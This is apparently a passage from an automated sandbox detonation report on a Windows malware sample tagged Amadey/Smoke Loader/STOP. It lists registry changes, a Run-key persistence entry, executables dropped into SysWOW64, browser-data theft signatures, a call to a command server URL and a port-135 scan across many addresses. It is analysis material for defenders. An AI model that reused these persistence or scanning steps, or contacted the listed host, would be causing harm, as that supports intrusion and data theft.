Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31190236" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\Version = "5" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31190236" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL = "http://www.bing.com/favicon.ico" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3110522722" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "458396011" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\KnownProvidersUpgradeTime = 04e1a46c61e1db01 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d500000000020000000000106600000001000020000000a92ebaefda676c3cf1f88b3f03cf4cfd50374ce163bcd74264df8f5eb3abfdf7000000000e8000000002000020000000f5cf0470a654ebb77198dca200e79cb0059f899522a6582889b4f6507c77f64620000000b1d2dee799cf063bc2efe1dd2bca8e42cede970198565944e065c2c8d2bbc644400000008a13a62bf9506fa8e3f31571745fb699b722715675df43d2e9d357d082423cee6c10a73c7d87db1c4466c7fab00e144dab280aeab8788b1f87d8eaef483fd798 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0770cbedcecdb01 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3111772701" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1039f2bddcecdb01 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000002147bd6711c293e91a3240266def873b3e3f177687b0a3767fff8fa8bd9a73d1000000000e800000000200002000000012b454777a0fd43af460831f603c2f1e0a99370245d4b54e8dcbe55136a24cf62000000025fda31e71e4fd8da126ff800a0fd79bd26618de86d4b806ade683151b9b09054000000045cfbe898ae8e4e2dcfc6d3eed5523b29f474860c48a17bfea156219260e49280066ae7e125249eb683b6ddecbffe4fd4a2be54c6d8c12c6bde28bd8f384b674 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000006a694a5b253abb4e1de7c441b2c7c38f483183c2cb14c143a65e1f3d00250fd6000000000e8000000002000020000000825d7021e8aa1e1f5e86195818c8dc8d6b357b37642efa13482ee4916991bff450000000d8e6a370fea996bd8870e31badc31fc9516c40aaa558003bcddb6b9fe4ba37639258551175f089fd8e88427f22ea2f62ce9c353e904fcfc8a2daeee7ef46ba1a4ebe8dbf729c253045c925358a5e77b74000000043ae198978f1228bd77a305ce9d541ce6553b6d0c37a2779dca0789806868f37860c8fccfa8bc43a6a3a399ce2afb5bdb976834722dedcf39f6d0e91ae65cdec C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\IEXPLORE.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe

"C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe"

C:\Program Files\Internet Explorer\IEXPLORE.exe

"C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4292 CREDAT:17410 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ÔN@

Network

Country Destination Domain Proto
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
GB 2.18.27.89:443 www.bing.com tcp
GB 2.18.27.89:443 www.bing.com tcp
US 150.171.27.10:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
US 38.36.25.1:135 tcp
US 38.36.25.2:135 tcp
US 38.36.25.3:135 tcp
US 38.36.25.4:135 tcp
US 38.36.25.5:135 tcp
US 38.36.25.6:135 tcp
US 38.36.25.7:135 tcp
US 38.36.25.8:135 tcp
US 38.36.25.9:135 tcp
US 38.36.25.10:135 tcp
US 38.36.25.11:135 tcp
US 38.36.25.12:135 tcp
US 38.36.25.13:135 tcp
US 38.36.25.14:135 tcp
US 38.36.25.15:135 tcp
US 38.36.25.16:135 tcp
US 38.36.25.17:135 tcp
US 38.36.25.18:135 tcp
US 38.36.25.19:135 tcp
US 38.36.25.20:135 tcp
US 38.36.25.21:135 tcp
US 38.36.25.22:135 tcp
US 38.36.25.23:135 tcp
US 38.36.25.24:135 tcp
US 38.36.25.25:135 tcp
US 38.36.25.26:135 tcp
US 38.36.25.27:135 tcp
US 38.36.25.28:135 tcp
US 38.36.25.29:135 tcp
US 38.36.25.30:135 tcp
US 38.36.25.31:135 tcp
US 38.36.25.32:135 tcp
US 38.36.25.33:135 tcp
US 38.36.25.34:135 tcp
US 38.36.25.35:135 tcp
US 38.36.25.36:135 tcp
US 38.36.25.37:135 tcp
US 38.36.25.38:135 tcp
US 38.36.25.39:135 tcp
US 38.36.25.40:135 tcp
US 38.36.25.41:135 tcp
US 38.36.25.42:135 tcp
US 38.36.25.43:135 tcp
US 38.36.25.44:135 tcp
US 38.36.25.45:135 tcp
US 38.36.25.46:135 tcp
US 38.36.25.47:135 tcp
US 38.36.25.48:135 tcp
US 38.36.25.49:135 tcp
US 38.36.25.50:135 tcp
US 38.36.25.51:135 tcp
US 38.36.25.52:135 tcp
US 38.36.25.53:135 tcp
US 38.36.25.54:135 tcp
US 38.36.25.55:135 tcp
US 38.36.25.56:135 tcp
US 38.36.25.57:135 tcp
US 38.36.25.58:135 tcp
US 38.36.25.59:135 tcp
US 38.36.25.60:135 tcp
US 38.36.25.61:135 tcp
US 38.36.25.62:135 tcp
US 38.36.25.63:135 tcp
US 38.36.25.64:135 tcp
US 38.36.25.65:135 tcp
US 38.36.25.66:135 tcp
US 38.36.25.67:135 tcp
US 38.36.25.68:135 tcp
US 38.36.25.69:135 tcp
US 38.36.25.70:135 tcp
US 38.36.25.71:135 tcp
US 38.36.25.72:135 tcp
US 38.36.25.73:135 tcp
US 38.36.25.74:135 tcp
US 38.36.25.75:135 tcp
US 38.36.25.76:135 tcp
US 38.36.25.77:135 tcp
US 38.36.25.78:135 tcp
US 38.36.25.79:135 tcp
US 38.36.25.80:135 tcp
US 38.36.25.81:135 tcp
US 38.36.25.82:135 tcp
US 38.36.25.83:135 tcp
US 38.36.25.84:135 tcp
US 38.36.25.85:135 tcp
US 38.36.25.86:135 tcp
US 38.36.25.87:135 tcp
US 38.36.25.88:135 tcp
US 38.36.25.89:135 tcp
US 38.36.25.90:135 tcp
US 38.36.25.91:135 tcp
US 38.36.25.92:135 tcp
US 38.36.25.93:135 tcp
US 38.36.25.94:135 tcp
US 38.36.25.95:135 tcp
US 38.36.25.96:135 tcp
US 38.36.25.97:135 tcp
US 38.36.25.98:135 tcp
US 38.36.25.99:135 tcp
US 38.36.25.100:135 tcp
US 38.36.25.101:135 tcp
US 38.36.25.102:135 tcp
US 38.36.25.103:135 tcp
US 38.36.25.104:135 tcp
US 38.36.25.105:135 tcp
US 38.36.25.106:135 tcp
US 38.36.25.107:135 tcp
US 38.36.25.108:135 tcp
US 38.36.25.109:135 tcp
US 38.36.25.110:135 tcp
US 38.36.25.111:135 tcp
US 38.36.25.112:135 tcp
US 38.36.25.113:135 tcp
US 38.36.25.114:135 tcp
US 38.36.25.115:135 tcp
US 38.36.25.116:135 tcp
US 38.36.25.117:135 tcp
US 38.36.25.118:135 tcp
US 38.36.25.119:135 tcp
US 38.36.25.120:135 tcp
US 38.36.25.121:135 tcp
US 38.36.25.122:135 tcp
US 38.36.25.123:135 tcp
US 38.36.25.124:135 tcp
US 38.36.25.125:135 tcp
US 38.36.25.126:135 tcp
US 38.36.25.127:135 tcp
US 38.36.25.128:135 tcp
US 38.36.25.129:135 tcp
US 38.36.25.130:135 tcp
US 38.36.25.131:135 tcp
US 38.36.25.132:135 tcp
US 38.36.25.133:135 tcp
US 38.36.25.134:135 tcp
US 38.36.25.135:135 tcp
US 38.36.25.136:135 tcp
US 38.36.25.137:135 tcp
US 38.36.25.138:135 tcp
US 38.36.25.139:135 tcp
US 38.36.25.140:135 tcp

Files

C:\Program Files\7-Zip\7z.exe

MD5 ccdca87540e56b27f2b104bb036662ff
SHA1 36d79e579770a2e4f619b4c09e635c5d48ff56d5
SHA256 630f929545e8277fe3a65970a8ed8c6b8271e2c6446e23334e117fdcecf2c51d
SHA512 636e01d3633c5f1abb0736acaab01e3a7a8f7dfe6c919750fab5cfffb85419432829464963af1a4c2f35458a7ab32d2913efdc8beacfdfd2f605cbf82fcf1a37

C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

MD5 da597791be3b6e732f0bc8b20e38ee62
SHA1 1125c45d285c360542027d7554a5c442288974de
SHA256 5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07
SHA512 d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

C:\Users\Admin\AppData\Local\Temp\Kno6244.tmp

MD5 002d5646771d31d1e7c57990cc020150
SHA1 a28ec731f9106c252f313cca349a68ef94ee3de9
SHA256 1e2e25bf730ff20c89d57aa38f7f34be7690820e8279b20127d0014dd27b743f
SHA512 689e90e7d83eef054a168b98ba2b8d05ab6ff8564e199d4089215ad3fe33440908e687aa9ad7d94468f9f57a4cc19842d53a9cd2f17758bdadf0503df63629c6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0

MD5 db3f2e41632254f91f7e5e41942d8ff0
SHA1 7da106440ca2f41c46abf0c425b49bbce80a1cfb
SHA256 601e2bdca83d313ce5087a94b902e3a8237c1255e1221deeb40b3ae5c3a9d9d3
SHA512 0cb09d9c84a09722a83150f24caf27cd72f873f77e765b45ac00b177c895f095d9126aafbba60aa3c54b2d3acbee104aa5d0ad1942aca4038586a2242528fbfe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0

MD5 db4fc9104dd3122525ff2f8b01e8f98f
SHA1 969b7c21da7425aea7c5f1eed16996c4f3feb59b
SHA256 e9f8e3fb52d7f5dd91a39b9afb315f054eede800e273820d408822475bb43538
SHA512 5b69cc0da387950f4ec6130bfc040511dd2564566d70561849a44c2f60aaaa4d826bb304d3788a773ebb250f9533cd37bb5325012202bd3e2cabd2436ed7d10f

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G9B4MDE2\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Analysis: behavioral2

Detonation Overview

Submitted

2025-07-04 12:10

Reported

2025-07-04 12:13

Platform

win11-20250619-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@" C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\cmd.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\dfrgui.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\mcbuilder.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\mmc.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\poqexec.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\RdpSaProxy.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\TpmTool.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\where.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\notepad.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\TSTheme.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\TSTheme.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\tttracer.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\certreq.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\Com_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\MRINFO.EXE_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\notepad.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\certreq.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\printui.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\expand.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SystemPropertiesProtection.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\tcmsetup.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\mcbuilder.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\powercfg.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\raserver.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SystemPropertiesRemote.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\taskkill.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\comp.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\Dism.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\fsutil.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\secinit.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SpatialAudioLicenseSrv.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SystemUWPLauncher.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\ByteCodeGenerator.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\cleanmgr.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\ctfmon.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\ieUnatt.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\Msdtc\Trace\msdtcvtr.bat C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\tasklist.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\userinit.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\F12\IEChooser.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\agentactivationruntimestarter.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\choice.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\dccw.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\IME\IMETC\IMTCPROP.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\tar.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
